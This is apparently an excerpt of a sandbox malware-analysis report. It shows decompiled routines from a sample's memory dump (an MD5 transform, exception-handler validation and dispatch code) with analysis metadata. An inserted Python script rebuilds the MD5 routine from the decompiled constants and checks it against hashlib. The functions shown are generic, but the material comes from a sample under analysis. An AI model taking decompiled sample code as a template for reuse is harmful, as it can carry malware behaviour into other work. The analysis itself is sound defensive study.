                            				_t402 =  *(_t226 + 8); // C
                            				_t349 =  *(_t226 + 0xc); // D ( *_t226 is A)
                            				// round 1, F(b,c,d) = (b & c) | (~b & d), M[0..15] in order, rotates 7/12/17/22
                            				asm("rol eax, 0x7");
                            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                            				asm("rol ecx, 0xc");
                            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                            				asm("ror edx, 0xf");
                            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                            				asm("ror esi, 0xa");
                            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                            				_v8 = _t685;
                            				_t690 = _v8;
                            				asm("rol eax, 0x7");
                            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                            				asm("rol ecx, 0xc");
                            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                            				asm("ror edx, 0xf");
                            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                            				asm("ror esi, 0xa");
                            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                            				_v8 = _t692;
                            				_t697 = _v8;
                            				asm("rol eax, 0x7");
                            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                            				asm("rol ecx, 0xc");
                            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                            				asm("ror edx, 0xf");
                            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                            				asm("ror esi, 0xa");
                            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                            				_v8 = _t699;
                            				asm("rol eax, 0x7");
                            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                            				asm("rol ecx, 0xc");
                            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                            				_t508 =  !_t357;
                            				asm("ror edx, 0xf");
                            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                            				_v12 = _t410;
                            				_v12 =  !_v12;
                            				asm("ror esi, 0xa");
                            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                            				// round 2, G(b,c,d) = (b & d) | (c & ~d), M[(5i+1) mod 16], rotates 5/9/14/20
                            				asm("rol eax, 0x5");
                            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                            				asm("rol ecx, 0x9");
                            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                            				asm("rol edx, 0xe");
                            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                            				asm("ror esi, 0xc");
                            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                            				asm("rol eax, 0x5");
                            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                            				asm("rol ecx, 0x9");
                            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                            				asm("rol edx, 0xe");
                            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                            				asm("ror esi, 0xc");
                            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                            				asm("rol eax, 0x5");
                            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                            				asm("rol ecx, 0x9");
                            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                            				asm("rol edx, 0xe");
                            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                            				asm("ror esi, 0xc");
                            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                            				asm("rol eax, 0x5");
                            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                            				asm("rol ecx, 0x9");
                            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                            				asm("rol edx, 0xe");
                            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                            				asm("ror esi, 0xc");
                            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                            				// round 3, H(b,c,d) = b ^ c ^ d, M[(3i+5) mod 16], rotates 4/11/16/23
                            				asm("rol eax, 0x4");
                            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                            				asm("rol ecx, 0xb");
                            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                            				asm("rol edx, 0x10");
                            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                            				_t599 = _t367 ^ _t420;
                            				asm("ror esi, 0x9");
                            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                            				asm("rol eax, 0x4");
                            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                            				asm("rol edi, 0xb");
                            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                            				asm("rol edx, 0x10");
                            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                            				_t338 = _t607 ^ _t422;
                            				asm("ror ecx, 0x9");
                            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                            				asm("rol eax, 0x4");
                            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                            				asm("rol esi, 0xb");
                            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                            				asm("rol edi, 0x10");
                            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                            				_t424 = _t734 ^ _t613;
                            				asm("ror ecx, 0x9");
                            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                            				asm("rol eax, 0x4");
                            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                            				asm("rol edx, 0xb");
                            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                            				asm("rol esi, 0x10");
                            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                            				asm("ror ecx, 0x9");
                            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                            				// round 4, I(b,c,d) = c ^ (b | ~d), M[7i mod 16], rotates 6/10/15/21
                            				asm("rol eax, 0x6");
                            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                            				asm("rol edx, 0xa");
                            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                            				asm("rol esi, 0xf");
                            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                            				asm("ror ecx, 0xb");
                            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                            				asm("rol eax, 0x6");
                            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                            				asm("rol edx, 0xa");
                            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                            				asm("rol esi, 0xf");
                            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                            				asm("ror ecx, 0xb");
                            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                            				asm("rol eax, 0x6");
                            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                            				asm("rol edx, 0xa");
                            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                            				asm("rol esi, 0xf");
                            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                            				asm("ror edi, 0xb");
                            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                            				asm("rol eax, 0x6");
                            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                            				asm("rol edx, 0xa");
                            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                            				_t400 = _a4;
                            				asm("rol esi, 0xf");
                            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                            				// add the working values back into the caller's state; the last round-4 step for B is folded into the +4 store
                            				 *_t400 =  *_t400 + _t259;
                            				asm("ror eax, 0xb");
                            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                            				return memset( &_v76, 0, 0x40); // wipe the 64-byte message schedule from the stack
                            			}
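The constants in E006D2DCC are enough to decide whether the routine is plain MD5 or a tweaked variant, which matters when you want to reuse a stock library to reproduce whatever the sample hashes. The check below is added here and is not code from the report or from the sample: it rebuilds the transform from the signed immediates, the message-word offsets (_v76 as M[0] through _v16 as M[15]) and the rotate counts printed in the decompilation, wraps it in standard padding, and compares the result with hashlib.md5. The names md5_compress, md5_digest and matches_stock_md5 and the test inputs are ours.

```python
"""Added check, not code from the sandbox report or the sample: rebuild the E006D2DCC
transform from the decompiled constants and confirm it agrees with hashlib's MD5."""
import hashlib
import struct

MASK = 0xFFFFFFFF

# The 64 additive constants exactly as the decompiler printed them (signed 32-bit
# immediates, in execution order); masking turns them into the familiar MD5 T[i].
_T_SIGNED = [
    -0x28955b88, -0x173848aa, 0x242070db, -0x3e423112, -0xa83f051, 0x4787c62a,
    -0x57cfb9ed, -0x2b96aff, 0x698098d8, -0x74bb0851, -0xa44f, -0x76a32842,
    0x6b901122, -0x2678e6d, -0x5986bc72, 0x49b40821,
    -0x9e1da9e, -0x3fbf4cc0, 0x265e5a51, -0x16493856, -0x29d0efa3, 0x2441453,
    -0x275e197f, -0x182c0438, 0x21e1cde6, -0x3cc8f82a, -0xb2af279, 0x455a14ed,
    -0x561c16fb, -0x3105c08, 0x676f02d9, -0x72d5b376,
    -0x5c6be, -0x788e097f, 0x6d9d6122, -0x21ac7f4, -0x5b4115bc, 0x4bdecfa9,
    -0x944b4a0, -0x41404390, 0x289b7ec6, -0x155ed806, -0x2b10cf7b, 0x4881d05,
    -0x262b2fc7, -0x1924661b, 0x1fa27cf8, -0x3b53a99b,
    -0xbd6ddbc, 0x432aff97, -0x546bdc59, -0x36c5fc7, 0x655b59c3, -0x70f3336e,
    -0x100b83, -0x7a7ba22f, 0x6fa87e4f, -0x1d31920, -0x5cfebcec, 0x4e0811a1,
    -0x8ac817e, -0x42c50dcb, 0x2ad7d2bb, -0x14792c6f,
]
T = [t & MASK for t in _T_SIGNED]

# Left-rotate count per step. The decompiler writes the 3rd/4th of each group as
# right rotates (ror 15 == rol 17, ror 10 == rol 22, ror 12 == rol 20, and so on).
S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4


def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md5_compress(state, block):
    """One call of the transform: `state` is the 4-dword A,B,C,D array the sample
    passes in _a4, `block` the 64 bytes it reads through __ecx as 16 LE dwords.
    Returns the updated state (also modified in place, as the sample does)."""
    assert len(block) == 64
    m = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(64):
        if i < 16:                     # round 1: (!b & d) | (c & b) in the decompilation
            f, g = (b & c) | (~b & d), i
        elif i < 32:                   # round 2: (!d & c) | (d & b)
            f, g = (b & d) | (c & ~d), (5 * i + 1) % 16
        elif i < 48:                   # round 3: b ^ c ^ d
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:                          # round 4: (!d | b) ^ c
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + T[i] + m[g]) & MASK
        a, d, c, b = d, c, b, (b + _rol(f, S[i])) & MASK
    # the sample adds the four working values back into *_a4 .. *(_a4 + 0xc)
    for k, v in enumerate((a, b, c, d)):
        state[k] = (state[k] + v) & MASK
    return state


def md5_digest(data):
    """Full MD5 on top of md5_compress: standard IV and Merkle-Damgard padding."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    padded = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(padded), 64):
        md5_compress(state, padded[off:off + 64])
    return struct.pack("<4I", *state)


def matches_stock_md5(data):
    """True when the rebuilt transform agrees with the platform MD5 on `data`."""
    return md5_digest(data) == hashlib.md5(data).digest()


if __name__ == "__main__":
    # constructed inputs: empty, one block, and the padding boundary (55/56 bytes) plus multi-block
    for sample in (b"", b"abc", b"A" * 55, b"B" * 56, bytes(range(256)) * 3):
        print(len(sample), md5_digest(sample).hex(), matches_stock_md5(sample))
```

If every input agrees with hashlib, the sample's routine can be treated as ordinary MD5 when reproducing its hashing elsewhere; a mismatch on even one input would point at a modified constant, shift or word order, which is exactly what the side-by-side table of signed immediates makes easy to spot.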

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: memset
                            • String ID: 5m
                            • API String ID: 2221118986-1963150287
                            • Opcode ID: 412acf920beb90b749619e227c8e20b073c7787657a072e8c53190dd0cc6b4ba
                            • Instruction ID: 9dac9cca8c45f3d5510d912cf87701f64f18f533505fead4407a633352b607a7
                            • Opcode Fuzzy Hash: 412acf920beb90b749619e227c8e20b073c7787657a072e8c53190dd0cc6b4ba
                            • Instruction Fuzzy Hash: B822847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D8521(long _a4) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				signed int _v16;
                            				short* _v32;
                            				void _v36;
                            				void* _t57;
                            				signed int _t58;
                            				signed int _t61;
                            				signed int _t62;
                            				void* _t63;
                            				signed int* _t68;
                            				intOrPtr* _t69;
                            				intOrPtr* _t71;
                            				intOrPtr _t72;
                            				intOrPtr _t75;
                            				void* _t76;
                            				signed int _t77;
                            				void* _t78;
                            				void _t80;
                            				signed int _t81;
                            				signed int _t84;
                            				signed int _t86;
                            				short* _t87;
                            				void* _t89;
                            				signed int* _t90;
                            				long _t91;
                            				signed int _t93;
                            				signed int _t94;
                            				signed int _t100;
                            				signed int _t102;
                            				void* _t104;
                            				long _t108;
                            				signed int _t110;
                            
                            				_t108 = _a4;
                            				_t76 =  *(_t108 + 8);
                            				if((_t76 & 0x00000003) != 0) {
                            					L3:
                            					return 0;
                            				}
                            				_a4 =  *[fs:0x4];
                            				_v8 =  *[fs:0x8];
                            				if(_t76 < _v8 || _t76 >= _a4) {
                            					_t102 =  *(_t108 + 0xc);
                            					__eflags = _t102 - 0xffffffff;
                            					if(_t102 != 0xffffffff) {
                            						_t91 = 0;
                            						__eflags = 0;
                            						_a4 = 0;
                            						_t57 = _t76;
                            						do {
                            							_t80 =  *_t57;
                            							__eflags = _t80 - 0xffffffff;
                            							if(_t80 == 0xffffffff) {
                            								goto L9;
                            							}
                            							__eflags = _t80 - _t91;
                            							if(_t80 >= _t91) {
                            								L20:
                            								_t63 = 0;
                            								L60:
                            								return _t63;
                            							}
                            							L9:
                            							__eflags =  *(_t57 + 4);
                            							if( *(_t57 + 4) != 0) {
                            								_t12 =  &_a4;
                            								 *_t12 = _a4 + 1;
                            								__eflags =  *_t12;
                            							}
                            							_t91 = _t91 + 1;
                            							_t57 = _t57 + 0xc;
                            							__eflags = _t91 - _t102;
                            						} while (_t91 <= _t102);
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							L15:
                            							_t81 =  *0x6da380; // 0x0
                            							_t110 = _t76 & 0xfffff000;
                            							_t58 = 0;
                            							__eflags = _t81;
                            							if(_t81 <= 0) {
                            								L18:
                            								_t104 = _t102 | 0xffffffff;
                            								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                            								__eflags = _t61;
                            								if(_t61 < 0) {
                            									_t62 = 0;
                            									__eflags = 0;
                            								} else {
                            									_t62 = _a4;
                            								}
                            								__eflags = _t62;
                            								if(_t62 == 0) {
                            									L59:
                            									_t63 = _t104;
                            									goto L60;
                            								} else {
                            									__eflags = _v12 - 0x1000000;
                            									if(_v12 != 0x1000000) {
                            										goto L59;
                            									}
                            									__eflags = _v16 & 0x000000cc;
                            									if((_v16 & 0x000000cc) == 0) {
                            										L46:
                            										_t63 = 1;
                            										 *0x6da3c8 = 1;
                            										__eflags =  *0x6da3c8;
                            										if( *0x6da3c8 != 0) {
                            											goto L60;
                            										}
                            										_t84 =  *0x6da380; // 0x0
                            										__eflags = _t84;
                            										_t93 = _t84;
                            										if(_t84 <= 0) {
                            											L51:
                            											__eflags = _t93;
                            											if(_t93 != 0) {
                            												L58:
                            												 *0x6da3c8 = 0;
                            												goto L5;
                            											}
                            											_t77 = 0xf;
                            											__eflags = _t84 - _t77;
                            											if(_t84 <= _t77) {
                            												_t77 = _t84;
                            											}
                            											_t94 = 0;
                            											__eflags = _t77;
                            											if(_t77 < 0) {
                            												L56:
                            												__eflags = _t84 - 0x10;
                            												if(_t84 < 0x10) {
                            													_t86 = _t84 + 1;
                            													__eflags = _t86;
                            													 *0x6da380 = _t86;
                            												}
                            												goto L58;
                            											} else {
                            												do {
                            													_t68 = 0x6da388 + _t94 * 4;
                            													_t94 = _t94 + 1;
                            													__eflags = _t94 - _t77;
                            													 *_t68 = _t110;
                            													_t110 =  *_t68;
                            												} while (_t94 <= _t77);
                            												goto L56;
                            											}
                            										}
                            										_t69 = 0x6da384 + _t84 * 4;
                            										while(1) {
                            											__eflags =  *_t69 - _t110;
                            											if( *_t69 == _t110) {
                            												goto L51;
                            											}
                            											_t93 = _t93 - 1;
                            											_t69 = _t69 - 4;
                            											__eflags = _t93;
                            											if(_t93 > 0) {
                            												continue;
                            											}
                            											goto L51;
                            										}
                            										goto L51;
                            									}
                            									_t87 = _v32;
                            									__eflags =  *_t87 - 0x5a4d;
                            									if( *_t87 != 0x5a4d) {
                            										goto L59;
                            									}
                            									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                            									__eflags =  *_t71 - 0x4550;
                            									if( *_t71 != 0x4550) {
                            										goto L59;
                            									}
                            									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                            									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                            										goto L59;
                            									}
                            									_t78 = _t76 - _t87;
                            									__eflags =  *((short*)(_t71 + 6));
                            									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                            									if( *((short*)(_t71 + 6)) <= 0) {
                            										goto L59;
                            									}
                            									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                            									__eflags = _t78 - _t72;
                            									if(_t78 < _t72) {
                            										goto L46;
                            									}
                            									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                            									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                            										goto L46;
                            									}
                            									__eflags =  *(_t89 + 0x27) & 0x00000080;
                            									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                            										goto L20;
                            									}
                            									goto L46;
                            								}
                            							} else {
                            								goto L16;
                            							}
                            							while(1) {
                            								L16:
                            								__eflags =  *((intOrPtr*)(0x6da388 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0x6da388 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 + 1;
                            								__eflags = _t58 - _t81;
                            								if(_t58 < _t81) {
                            									continue;
                            								}
                            								goto L18;
                            							}
                            							__eflags = _t58;
                            							if(_t58 <= 0) {
                            								goto L5;
                            							}
                            							 *0x6da3c8 = 1;
                            							__eflags =  *0x6da3c8;
                            							if( *0x6da3c8 != 0) {
                            								goto L5;
                            							}
                            							__eflags =  *((intOrPtr*)(0x6da388 + _t58 * 4)) - _t110;
                            							if( *((intOrPtr*)(0x6da388 + _t58 * 4)) == _t110) {
                            								L32:
                            								_t100 = 0;
                            								__eflags = _t58;
                            								if(_t58 < 0) {
                            									L34:
                            									 *0x6da3c8 = 0;
                            									goto L5;
                            								} else {
                            									goto L33;
                            								}
                            								do {
                            									L33:
                            									_t90 = 0x6da388 + _t100 * 4;
                            									_t100 = _t100 + 1;
                            									__eflags = _t100 - _t58;
                            									 *_t90 = _t110;
                            									_t110 =  *_t90;
                            								} while (_t100 <= _t58);
                            								goto L34;
                            							}
                            							_t25 = _t81 - 1; // -1
                            							_t58 = _t25;
                            							__eflags = _t58;
                            							if(_t58 < 0) {
                            								L28:
                            								__eflags = _t81 - 0x10;
                            								if(_t81 < 0x10) {
                            									_t81 = _t81 + 1;
                            									__eflags = _t81;
                            									 *0x6da380 = _t81;
                            								}
                            								_t28 = _t81 - 1; // 0x0
                            								_t58 = _t28;
                            								goto L32;
                            							} else {
                            								goto L25;
                            							}
                            							while(1) {
                            								L25:
                            								__eflags =  *((intOrPtr*)(0x6da388 + _t58 * 4)) - _t110;
                            								if( *((intOrPtr*)(0x6da388 + _t58 * 4)) == _t110) {
                            									break;
                            								}
                            								_t58 = _t58 - 1;
                            								__eflags = _t58;
                            								if(_t58 >= 0) {
                            									continue;
                            								}
                            								break;
                            							}
                            							__eflags = _t58;
                            							if(__eflags >= 0) {
                            								if(__eflags == 0) {
                            									goto L34;
                            								}
                            								goto L32;
                            							}
                            							goto L28;
                            						}
                            						_t75 =  *((intOrPtr*)(_t108 - 8));
                            						__eflags = _t75 - _v8;
                            						if(_t75 < _v8) {
                            							goto L20;
                            						}
                            						__eflags = _t75 - _t108;
                            						if(_t75 >= _t108) {
                            							goto L20;
                            						}
                            						goto L15;
                            					}
                            					L5:
                            					_t63 = 1;
                            					goto L60;
                            				} else {
                            					goto L3;
                            				}
                            			}

                            APIs
                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 006D85D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: MemoryQueryVirtual
                            • String ID:
                            • API String ID: 2850889275-0
                            • Opcode ID: 9fa5e50f2c9370c7c62c5d362c447ecc6118553d5d7e5e9f8d9a7eb002668ce2
                            • Instruction ID: 92b16257ebc86c4c5079c1877bb79455dd9827b12afd0060210bd122e575cbc0
                            • Opcode Fuzzy Hash: 9fa5e50f2c9370c7c62c5d362c447ecc6118553d5d7e5e9f8d9a7eb002668ce2
                            • Instruction Fuzzy Hash: 4261EF30E046429FDB69CF28D8986B973A7FB853A4F28856BD856C7391EF31DC428741
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 71%
                            			E006D82FC(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                            				intOrPtr _v8;
                            				char _v12;
                            				void* __ebp;
                            				signed int* _t43;
                            				char _t44;
                            				void* _t46;
                            				void* _t49;
                            				intOrPtr* _t53;
                            				void* _t54;
                            				void* _t65;
                            				long _t66;
                            				signed int* _t80;
                            				signed int* _t82;
                            				void* _t84;
                            				signed int _t86;
                            				void* _t89;
                            				void* _t95;
                            				void* _t96;
                            				void* _t99;
                            				void* _t106;
                            
                            				_t43 = _t84;
                            				_t65 = __ebx + 2;
                            				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                            				_t89 = _t95;
                            				_t96 = _t95 - 8;
                            				_push(_t65);
                            				_push(_t84);
                            				_push(_t89);
                            				asm("cld");
                            				_t66 = _a8;
                            				_t44 = _a4;
                            				if(( *(_t44 + 4) & 0x00000006) != 0) {
                            					_push(_t89);
                            					E006D8467(_t66 + 0x10, _t66, 0xffffffff);
                            					_t46 = 1;
                            				} else {
                            					_v12 = _t44;
                            					_v8 = _a12;
                            					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                            					_t86 =  *(_t66 + 0xc);
                            					_t80 =  *(_t66 + 8);
                            					_t49 = E006D8521(_t66);
                            					_t99 = _t96 + 4;
                            					if(_t49 == 0) {
                            						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                            						goto L11;
                            					} else {
                            						while(_t86 != 0xffffffff) {
                            							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                            							if(_t53 == 0) {
                            								L8:
                            								_t80 =  *(_t66 + 8);
                            								_t86 = _t80[_t86 + _t86 * 2];
                            								continue;
                            							} else {
                            								_t54 =  *_t53();
                            								_t89 = _t89;
                            								_t86 = _t86;
                            								_t66 = _a8;
                            								_t55 = _t54;
                            								_t106 = _t54;
                            								if(_t106 == 0) {
                            									goto L8;
                            								} else {
                            									if(_t106 < 0) {
                            										_t46 = 0;
                            									} else {
                            										_t82 =  *(_t66 + 8);
                            										E006D840C(_t55, _t66);
                            										_t89 = _t66 + 0x10;
                            										E006D8467(_t89, _t66, 0);
                            										_t99 = _t99 + 0xc;
                            										E006D8503(_t82[2]);
                            										 *(_t66 + 0xc) =  *_t82;
                            										_t66 = 0;
                            										_t86 = 0;
                            										 *(_t82[2])(1);
                            										goto L8;
                            									}
                            								}
                            							}
                            							goto L13;
                            						}
                            						L11:
                            						_t46 = 1;
                            					}
                            				}
                            				L13:
                            				return _t46;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction ID: 2d80baf9cf364e92103630843da4e1af34cd7304462139cd3715fa246bd72813
                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                            • Instruction Fuzzy Hash: 1021B672D002049FCB10DFA9C8859ABB7A6FF44350B468569E9599B345DB30F915C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E006D6CA4(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
                            				intOrPtr _v4;
                            				signed int _v8;
                            				int* _v12;
                            				char* _v16;
                            				intOrPtr _v20;
                            				void* _v24;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				void* _v40;
                            				void* __ebx;
                            				void* __edi;
                            				long _t68;
                            				intOrPtr _t69;
                            				intOrPtr _t70;
